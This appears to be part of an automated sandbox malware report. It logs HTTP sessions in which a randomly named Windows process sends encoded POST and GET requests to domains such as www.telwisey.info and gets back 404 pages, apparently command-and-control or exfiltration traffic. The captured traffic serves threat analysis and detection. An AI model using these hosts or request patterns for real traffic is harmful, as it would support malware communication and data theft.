YXDT=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1kAn58FTjAxuq4PeuN4bMBpgXUJgXbh88rXn8hNMNerANtF6Phn6foShSjeypO59r05R9dFlu7GvgNEIfTE5PmB3tj+IWxotRu5BmIqhkNrFw+pyaJaGk28jJBxo+S5zlmRxnX20wzXcaVxYpEH3LmiIh6cfjxcgvnwCRFSUk+54ZwXMq2uVfWg45fy3AGQzdV0Np8TVLwPRY+/xdMHOnXEhv4iPmemX/cOS94WU0d5qD9i2AgKZpGX3/iXT2LKbDQeBHqjcbvsf+3uO3lEe9uh4Ic1bpTELlpQIIkNOadANHvb2C0G47hpS289mPWEhU7agJWFP1Kjltroa6VdCUJXYi6RC8YAjamqKG1ttCF866n89Nmtq2ZqOPRKfrd2pc43BKWWf72kNi4RViUj1q1SPEjdVm1Tkyr4Pan9tieLsBpAAXZ6Vvb5sZC+bzduLc39lWejU3hpNfJUflhfJ9Xq2YfXc9K7daT1HyNKaI4/lCZZpBzAPxt17F6LMfSFJ9zlL13wXv9AAr2wEAzVXuP/h+S6x9x0umTug7oSrXBy1AB/jhwv504FVZRVAmxjbmiq7Bsq4IeezFzTvYJc6VdOD271QYJRHBOkstDKbE6JIo8zAUTUl7oPkBMVEyJV9n9oKjAKRPffXfF64OV5uQZQFlpvDA+SK0q+oyZo2uZjaKtuVhNz3NKtMTJUQ5ulyjMEt7leYc0i4cvfds3Qzvqd0bB+iVWlRBjZ91MOqiOzRhPrRRrZPs9Zy+QIeQEM7PWKnC3fqHQ7ryMGqy9dfROe88xB4BSGqQQ+7qgDFbWpWM9wS/mi41cuCi27sKlzLY1E7jVT [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49759	23.251.54.212	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:15.291173935 CEST	497	OUT	GET /li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.anuts.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49760	199.192.19.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:41.698921919 CEST	771	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 4e 4b 57 2f 30 38 51 37 61 6f 75 35 49 44 46 77 49 77 30 57 2f 34 6a 44 6e 74 36 38 6d 2f 74 69 41 3d 3d Data Ascii: YXDT=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34NKW/08Q7aou5IDFwIw0W/4jDnt68m/tiA==
Aug 12, 2024 05:15:42.288678885 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:15:42 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 12, 2024 05:15:42.288707972 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 12, 2024 05:15:42.288733959 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 12, 2024 05:15:42.288765907 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 12, 2024 05:15:42.288783073 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 12, 2024 05:15:42.288799047 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 12, 2024 05:15:42.288815022 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 12, 2024 05:15:42.288830042 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 12, 2024 05:15:42.288849115 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 12, 2024 05:15:42.288862944 CEST	224	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
Aug 12, 2024 05:15:42.294327974 CEST	1236	IN	Data Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49761	199.192.19.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:44.230930090 CEST	791	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 63 4a 30 75 7a 2f 37 52 55 79 65 58 56 46 41 55 69 44 59 4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 63 51 65 67 6b 4f 78 6c 43 6b 35 47 45 62 77 57 33 74 63 79 32 51 77 30 33 63 64 55 38 4d 51 42 59 3d Data Ascii: YXDT=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
Aug 12, 2024 05:15:44.838941097 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:15:44 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 12, 2024 05:15:44.838992119 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 12, 2024 05:15:44.839025974 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 12, 2024 05:15:44.839060068 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 12, 2024 05:15:44.839095116 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 12, 2024 05:15:44.839128017 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 12, 2024 05:15:44.839160919 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 12, 2024 05:15:44.839194059 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 12, 2024 05:15:44.839226007 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 12, 2024 05:15:44.839258909 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
Aug 12, 2024 05:15:44.850224972 CEST	1236	IN	Data Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20 Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49762	199.192.19.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:46.760613918 CEST	10873	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 63 4d 6a 4a 54 30 37 71 35 72 5a 4d 30 2b 4f 6a 59 2f 32 58 53 63 38 47 4d 76 78 6a 6a 45 4c 6a 50 39 77 6b 32 6f 4a 57 56 4e 53 30 68 44 50 38 67 32 78 79 55 2b 76 74 74 30 74 70 53 50 71 7a 6c 44 68 36 6a 4d 4e 6e 35 55 47 4b 46 61 67 36 47 6b 5a 6d 35 57 52 72 78 72 64 41 6b 68 43 70 64 73 43 71 36 6e 58 4f 32 61 78 65 71 71 78 73 71 59 44 4f 79 78 45 6a 2b 61 37 62 75 51 35 6e 77 4a 31 65 6f 48 73 4c 59 51 62 32 31 30 2f 75 7a 6e 66 57 57 44 33 44 6f 66 51 4c 65 55 2f 63 38 73 77 [TRUNCATED] Data Ascii: 